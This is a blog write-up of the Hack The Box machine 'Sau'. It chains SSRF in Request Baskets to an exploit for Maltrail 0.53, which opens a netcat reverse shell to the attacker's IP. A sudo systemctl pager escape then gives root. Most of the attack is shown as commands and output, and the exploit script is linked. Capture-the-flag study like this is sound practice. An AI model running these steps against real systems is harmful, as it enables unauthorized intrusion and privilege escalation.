The Be Sure Blog

Code Snippets | Problem Solving | Tips & Tricks

The Be Sure Blog banner

Sau: Use Server Side Request Forgery to pwn the machine

posted on 10.8.2023 by Below Surface in "Hack The Box"

Portscan:

sudo nmap -sV 10.10.11.224

Reveals:

PORT     STATE   SERVICE VERSION
22/tcp   open    ssh    OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp   filtered http
55555/tcp open    unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port55555-TCP:V=7.94%I=7%D=8/10%Time=64D477DD%P=x86_64-pc-linux-gnu%r(G
(...)

For port 55555 we get a bunch of different responses gathered by Nmap. Some indicate that a website may be running on this port, so we check that in the browser:

10.10.11.224:55555

Yes! A website is displayed. Here we can create buckets to analyze API calls. Let's create a bucket named "buck". Then open it. The URL for the bucket is

http://10.10.11.224:55555/buck

The website allows you to modify this bucket, by clicking the settings button. After some research about the system, we found an exploit for this version, which we will use to get a reverse shell. Configure the bucket to:

Forward URL: http://127.0.0.1:80
Set a check mark for "Proxy Response"
Hit apply

Now, when visiting:

http://10.10.11.224:55555/buck

We get a broken Maltrail frontend displayed. And we find out that the version 0.53 is exploitable!


So we open a new terminal window and start Netcat on port 80:

sudo netcat -lvnp 80

Expected output:

listening on [any] 80 ...

Then we create a new file and paste in the Maltrail-v0.53-Exploit code (resource below):

mkdir temp
cd temp
sudo nano exploitMaltrail.py

paste the code, hit ctrl + shift + o, then hit enter and then ctrl + shift + x to close the editor.

Before running the exploit, we change the Forward URL of the bucket to:

Forward URL: http://127.0.0.1:80/login

Now, run the exploit:

python3 exploitMaltrail.py YOURIP 80 http://10.10.11.224:55555/buck

Expected output:

Running exploit on http://10.10.11.224:55555/buck

After a short while, in the Netcat window, the reverse shell opens up! Go and get the user flag:

cd ~
cat user.txt

Time for privilege escalation. Check if the current user puma can run any sudo commands:

sudo -l

Relevant output:

User puma may run the following commands on sau:
   (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

So, let's run this command:

sudo /usr/bin/systemctl status trail.service

Type in

!sh

Hit enter

cd ~
cat root.txt

Done!

Tags:

hack the box
server side request forgery
ssrf
known vulnerabilities
maltrail
request baskets

Sources:

https://app.hackthebox.com/machines/Sauhttps://notes.sjtu.edu.cn/s/MUUhEymt7#https://github.com/entr0pie/CVE-2023-27163https://github.com/spookier/Maltrail-v0.53-Exploit/tree/mainhttps://mirror.xyz/zerodaily.eth/CxIO5X6zpK42DguO5UJ60rJNpzWpIo-40PSImW39rnohttps://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-systemctl-privilege-escalation/

More posts of this category

Meow: How to pwn the machine (Nmap, Telnet)

Use nmap and telnet to get the flag

Hack The Box

Fawn: Pwn the machine (FTP)

Find the open FTP port and extract the flag!

Hack The Box

Dancing: Pwn the machine (SMB)

How to retrieve the flag with SMB (Server-Message-Block)

Hack The Box

Redeemer: Pwn the machine and capture the flag (Redis)

How to get the flag from the Redis database

Hack The Box

Appointment: Use SQL-Injection to pwn the machine

How to extract the flag by logging in without a password

Hack The Box

Sequel: Access a MariaDB instance with default credentials

Scan for the open ports, log into the database and get the flag!

Hack The Box

Crocodile: Capture the flag! (FTP, Gobuster)

Get credentials via the open FTP port and use Gobuster to find the login file

Hack The Box

Responder: Crack the password hash and login as admin

Use Nmap, modify the hosts file and exploit LFI to grab the hash and crack it

Hack The Box

Three: Get a reverse shell via AWS S3

Use Nmap, Gobuster, Ncat, PHP and the AWS CLI to capture the flag

Hack The Box

Archetype: From user to admin

Make good use of nmap, smbclient, mssqlclient, xp_cmdshell, winPEAS & psexec

Hack The Box

Oopsie: Modify the login cookie, escalate privileges and get the flag!

Upload a PHP reverse shell, get user and then root privileges to pwn the machine

Hack The Box

Vaccine: Pwn the machine (zip2john, hashcat, sqlmap)

Crack the .zip archive, use sql injection and escalate your privileges to get the flags

Hack The Box

Unified: Exploit Log4j, modify a MongoDB entry and get the flags

Log4j exploitation, HTTP request modification & privilege escalation

Hack The Box

Explosion: Use xfreerdp to connect to the service

Make use of the poorly configured service and get the flag

Hack The Box

Preignition: Use Gobuster and default credentials

Gobuster is used to find the login page of the server by dir busting

Hack The Box

Mongod: Use the MongoDB cli to get the flag

MongoDB is a NoSQL database. Use the mongo cli to pwn the machine

Hack The Box

Synced: Use Rsync to browse public shares

Rsync is a fast file copying tool. We will use it to download the flag

Hack The Box

Ignition: Use Gobuster and a common used password

Modify the hosts file, do dir busting and try common passwords to get the flag

Hack The Box

Bike: Exploit a Node.js template engine vulnerability

Insert malicious code to leave the sandbox and get the flag!

Hack The Box

Funnel: Use local port forwarding to access the PostgreSQL DB

Since we can't interact with the DB directly, we use tunneling

Hack The Box

Pennyworth: Remote command execution vulnerability

Default credentials help us to execute Groovy Script code to get a reverse shell

Hack The Box

Tactics: Get the flag via Samba Client or psexec.py

Browse the Windows shares with default credentials and extract the flag

Hack The Box

Included: Local file inclusion, reverse shell and privilege escalation

Use TFTP, get a reverse shell, build and upload an Alpine image with root

Hack The Box

Markup: Use XXE Injection and privilege escalation to get the flag

Nmap, BurpSuite, Ncat, default credentials and misconfigurations

Hack The Box

Base: PHP Type Juggling, Arbitrary File Upload, clear text credentials

Use BurpSuite, Netcat, SSH, Gobuster and PHP to get a reverse shell

Hack The Box

Pilgrimage: Use various exploits to get the two flags

Git Repo Dump, Arbitrary File Read, Remote Code Execution

Hack The Box

Topology: Use LaTeX Injection and Hashcat

Get the credentials and crack the password hash to get the flags

Hack The Box

MonitorsTwo: Use two exploits, crack the BCrypt hash and escalate privileges

Get a reverse shell, break out of a Docker container and get the flags

Hack The Box